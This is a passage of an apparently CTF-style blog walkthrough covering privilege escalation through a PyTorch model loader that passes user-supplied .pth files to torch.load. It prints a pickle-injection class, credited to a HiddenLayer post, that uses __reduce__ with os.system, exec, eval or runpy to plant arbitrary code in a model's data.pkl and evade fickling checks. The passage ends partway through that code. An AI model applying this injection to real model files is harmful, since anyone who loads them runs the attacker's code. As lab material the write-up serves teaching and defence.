&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> numpy &lt;span style="color:#fe8019">as&lt;/span> np
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> sys
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">class&lt;/span> CustomCNN(nn&lt;span style="color:#fe8019">.&lt;/span>Module):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">super&lt;/span>(CustomCNN, self)&lt;span style="color:#fe8019">.&lt;/span>__init__()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>conv1 &lt;span style="color:#fe8019">=&lt;/span> nn&lt;span style="color:#fe8019">.&lt;/span>Conv2d(in_channels&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">3&lt;/span>, out_channels&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">16&lt;/span>, kernel_size&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">3&lt;/span>, padding&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">1&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>conv2 &lt;span style="color:#fe8019">=&lt;/span> nn&lt;span style="color:#fe8019">.&lt;/span>Conv2d(in_channels&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">16&lt;/span>, out_channels&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">32&lt;/span>, kernel_size&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">3&lt;/span>, padding&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">1&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>pool &lt;span style="color:#fe8019">=&lt;/span> nn&lt;span style="color:#fe8019">.&lt;/span>MaxPool2d(kernel_size&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">2&lt;/span>, stride&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">2&lt;/span>, padding&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">0&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>fc1 &lt;span style="color:#fe8019">=&lt;/span> nn&lt;span style="color:#fe8019">.&lt;/span>Linear(in_features&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">32&lt;/span> &lt;span style="color:#fe8019">*&lt;/span> &lt;span style="color:#d3869b">8&lt;/span> &lt;span style="color:#fe8019">*&lt;/span> &lt;span style="color:#d3869b">8&lt;/span>, out_features&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">128&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>fc2 &lt;span style="color:#fe8019">=&lt;/span> nn&lt;span style="color:#fe8019">.&lt;/span>Linear(in_features&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">128&lt;/span>, out_features&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">10&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>relu &lt;span style="color:#fe8019">=&lt;/span> nn&lt;span style="color:#fe8019">.&lt;/span>ReLU()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">forward&lt;/span>(self, x):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> x &lt;span style="color:#fe8019">=&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>pool(self&lt;span style="color:#fe8019">.&lt;/span>relu(self&lt;span style="color:#fe8019">.&lt;/span>conv1(x)))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> x &lt;span style="color:#fe8019">=&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>pool(self&lt;span style="color:#fe8019">.&lt;/span>relu(self&lt;span style="color:#fe8019">.&lt;/span>conv2(x)))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> x &lt;span style="color:#fe8019">=&lt;/span> x&lt;span style="color:#fe8019">.&lt;/span>view(&lt;span style="color:#fe8019">-&lt;/span>&lt;span style="color:#d3869b">1&lt;/span>, &lt;span style="color:#d3869b">32&lt;/span> &lt;span style="color:#fe8019">*&lt;/span> &lt;span style="color:#d3869b">8&lt;/span> &lt;span style="color:#fe8019">*&lt;/span> &lt;span style="color:#d3869b">8&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> x &lt;span style="color:#fe8019">=&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>relu(self&lt;span style="color:#fe8019">.&lt;/span>fc1(x))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> x &lt;span style="color:#fe8019">=&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>fc2(x)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> x
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">load_model&lt;/span>(model_path):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> model &lt;span style="color:#fe8019">=&lt;/span> CustomCNN()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> state_dict &lt;span style="color:#fe8019">=&lt;/span> torch&lt;span style="color:#fe8019">.&lt;/span>load(model_path)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> model&lt;span style="color:#fe8019">.&lt;/span>load_state_dict(state_dict)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> model&lt;span style="color:#fe8019">.&lt;/span>eval()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> model
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">prepare_dataloader&lt;/span>(batch_size&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">32&lt;/span>):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> transform &lt;span style="color:#fe8019">=&lt;/span> transforms&lt;span style="color:#fe8019">.&lt;/span>Compose([
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> transforms&lt;span style="color:#fe8019">.&lt;/span>RandomHorizontalFlip(),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> transforms&lt;span style="color:#fe8019">.&lt;/span>RandomCrop(&lt;span style="color:#d3869b">32&lt;/span>, padding&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">4&lt;/span>),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> transforms&lt;span style="color:#fe8019">.&lt;/span>ToTensor(),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> transforms&lt;span style="color:#fe8019">.&lt;/span>Normalize(mean&lt;span style="color:#fe8019">=&lt;/span>[&lt;span style="color:#d3869b">0.4914&lt;/span>, &lt;span style="color:#d3869b">0.4822&lt;/span>, &lt;span style="color:#d3869b">0.4465&lt;/span>], std&lt;span style="color:#fe8019">=&lt;/span>[&lt;span style="color:#d3869b">0.2023&lt;/span>, &lt;span style="color:#d3869b">0.1994&lt;/span>, &lt;span style="color:#d3869b">0.2010&lt;/span>]),
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ])
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> dataset &lt;span style="color:#fe8019">=&lt;/span> CIFAR10(root&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;/root/datasets/&amp;#39;&lt;/span>, train&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">False&lt;/span>, download&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">False&lt;/span>, transform&lt;span style="color:#fe8019">=&lt;/span>transform)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> subset &lt;span style="color:#fe8019">=&lt;/span> Subset(dataset, indices&lt;span style="color:#fe8019">=&lt;/span>np&lt;span style="color:#fe8019">.&lt;/span>random&lt;span style="color:#fe8019">.&lt;/span>choice(&lt;span style="color:#fabd2f">len&lt;/span>(dataset), &lt;span style="color:#d3869b">64&lt;/span>, replace&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">False&lt;/span>))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> dataloader &lt;span style="color:#fe8019">=&lt;/span> DataLoader(subset, batch_size&lt;span style="color:#fe8019">=&lt;/span>batch_size, shuffle&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">False&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> dataloader
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">evaluate_model&lt;/span>(model, dataloader):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> correct &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#d3869b">0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> total &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#d3869b">0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">with&lt;/span> torch&lt;span style="color:#fe8019">.&lt;/span>no_grad():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> images, labels &lt;span style="color:#fe8019">in&lt;/span> dataloader:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> outputs &lt;span style="color:#fe8019">=&lt;/span> model(images)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> _, predicted &lt;span style="color:#fe8019">=&lt;/span> torch&lt;span style="color:#fe8019">.&lt;/span>max(outputs&lt;span style="color:#fe8019">.&lt;/span>data, &lt;span style="color:#d3869b">1&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> total &lt;span style="color:#fe8019">+=&lt;/span> labels&lt;span style="color:#fe8019">.&lt;/span>size(&lt;span style="color:#d3869b">0&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> correct &lt;span style="color:#fe8019">+=&lt;/span> (predicted &lt;span style="color:#fe8019">==&lt;/span> labels)&lt;span style="color:#fe8019">.&lt;/span>sum()&lt;span style="color:#fe8019">.&lt;/span>item()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> accuracy &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#d3869b">100&lt;/span> &lt;span style="color:#fe8019">*&lt;/span> correct &lt;span style="color:#fe8019">/&lt;/span> total
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">f&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;[+] Accuracy of the model on the test dataset: &lt;/span>&lt;span style="color:#b8bb26">{&lt;/span>accuracy&lt;span style="color:#b8bb26">:&lt;/span>&lt;span style="color:#b8bb26">.2f&lt;/span>&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">%&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">main&lt;/span>(model_path):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> model &lt;span style="color:#fe8019">=&lt;/span> load_model(model_path)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[+] Loaded Model.&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> dataloader &lt;span style="color:#fe8019">=&lt;/span> prepare_dataloader()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[+] Dataloader ready. Evaluating model...&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> evaluate_model(model, dataloader)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> __name__ &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;__main__&amp;#34;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fabd2f">len&lt;/span>(sys&lt;span style="color:#fe8019">.&lt;/span>argv) &lt;span style="color:#fe8019">&amp;lt;&lt;/span> &lt;span style="color:#d3869b">2&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;Usage: python script.py &amp;lt;path_to_model.pth&amp;gt;&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> model_path &lt;span style="color:#fe8019">=&lt;/span> sys&lt;span style="color:#fe8019">.&lt;/span>argv[&lt;span style="color:#d3869b">1&lt;/span>] &lt;span style="color:#928374;font-style:italic"># Path to the .pth file&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> main(model_path)
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order for us to load a malicious pickle file and run arbitrary commands, we need to create a pickle file that bypasses the checks of&lt;code>fickling&lt;/code>.
After some searching, I found another blog by Hiddenlayer: &lt;a href="https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/">Weaponizing ML Models with Ransomware&lt;/a>. The blog post explains some techniques which we can use to modify exisitng models to execute arbitrary commands.
There&amp;rsquo;s already a pretrained PyTorch model in the &lt;code>/models&lt;/code> directory. &lt;code>.pth&lt;/code> files are used in PyTorch to sore model weights and other relevant infomation for deep learning models. If we extract the &lt;code>demo_model.pth&lt;/code> file we can see there&amp;rsquo;s a &lt;code>data.pkl&lt;/code> file inside it.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013170347.webp" alt="">&lt;/p>
&lt;p>We can inject the model’s &lt;code>data.pkl&lt;/code> file with an instruction to execute arbitrary code using the python script from the blog.&lt;/p>
&lt;h2 id="privilege-escalation-1">Privilege Escalation&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> os
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> argparse
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> pickle
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> struct
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> shutil
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> pathlib &lt;span style="color:#fe8019">import&lt;/span> Path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> torch
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">class&lt;/span> PickleInject():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Pickle injection. Pretends to be a &amp;#34;module&amp;#34; to work with torch.&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, inj_objs, first&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">True&lt;/span>):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>__name__ &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;pickle_inject&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>inj_objs &lt;span style="color:#fe8019">=&lt;/span> inj_objs
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>first &lt;span style="color:#fe8019">=&lt;/span> first
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">class&lt;/span> _Pickler(pickle&lt;span style="color:#fe8019">.&lt;/span>_Pickler):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Reimplementation of Pickler with support for injection&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, file, protocol, inj_objs, first&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">True&lt;/span>):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">super&lt;/span>()&lt;span style="color:#fe8019">.&lt;/span>__init__(file, protocol)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>inj_objs &lt;span style="color:#fe8019">=&lt;/span> inj_objs
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>first &lt;span style="color:#fe8019">=&lt;/span> first
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">dump&lt;/span>(self, obj):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Pickle data, inject object before or after&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>proto &lt;span style="color:#fe8019">&amp;gt;=&lt;/span> &lt;span style="color:#d3869b">2&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>write(pickle&lt;span style="color:#fe8019">.&lt;/span>PROTO &lt;span style="color:#fe8019">+&lt;/span> struct&lt;span style="color:#fe8019">.&lt;/span>pack(&lt;span style="color:#b8bb26">&amp;#34;&amp;lt;B&amp;#34;&lt;/span>, self&lt;span style="color:#fe8019">.&lt;/span>proto))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>proto &lt;span style="color:#fe8019">&amp;gt;=&lt;/span> &lt;span style="color:#d3869b">4&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>framer&lt;span style="color:#fe8019">.&lt;/span>start_framing()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Inject the object(s) before the user-supplied data?&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>first:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Pickle injected objects&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> inj_obj &lt;span style="color:#fe8019">in&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>inj_objs:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>save(inj_obj)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Pickle user-supplied data&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>save(obj)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Inject the object(s) after the user-supplied data?&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">not&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>first:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Pickle injected objects&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> inj_obj &lt;span style="color:#fe8019">in&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>inj_objs:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>save(inj_obj)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>write(pickle&lt;span style="color:#fe8019">.&lt;/span>STOP)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>framer&lt;span style="color:#fe8019">.&lt;/span>end_framing()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">Pickler&lt;/span>(self, file, protocol):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Initialise the pickler interface with the injected object&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>_Pickler(file, protocol, self&lt;span style="color:#fe8019">.&lt;/span>inj_objs)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">class&lt;/span> _PickleInject():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Base class for pickling injected commands&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, args, command&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">None&lt;/span>):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>command &lt;span style="color:#fe8019">=&lt;/span> command
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> self&lt;span style="color:#fe8019">.&lt;/span>args &lt;span style="color:#fe8019">=&lt;/span> args
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">__reduce__&lt;/span>(self):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>command, (self&lt;span style="color:#fe8019">.&lt;/span>args,)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">class&lt;/span> System(_PickleInject):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Create os.system command&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, args):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">super&lt;/span>()&lt;span style="color:#fe8019">.&lt;/span>__init__(args, command&lt;span style="color:#fe8019">=&lt;/span>os&lt;span style="color:#fe8019">.&lt;/span>system)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">class&lt;/span> Exec(_PickleInject):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Create exec command&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, args):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">super&lt;/span>()&lt;span style="color:#fe8019">.&lt;/span>__init__(args, command&lt;span style="color:#fe8019">=&lt;/span>exec)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">class&lt;/span> Eval(_PickleInject):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Create eval command&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, args):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">super&lt;/span>()&lt;span style="color:#fe8019">.&lt;/span>__init__(args, command&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fabd2f">eval&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">class&lt;/span> RunPy(_PickleInject):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&amp;#34;Create runpy command&amp;#34;&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> __init__(self, args):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">import&lt;/span> runpy
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">super&lt;/span>()&lt;span style="color:#fe8019">.&lt;/span>__init__(args, command&lt;span style="color:#fe8019">=&lt;/span>runpy&lt;span style="color:#fe8019">.&lt;/span>_run_code)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
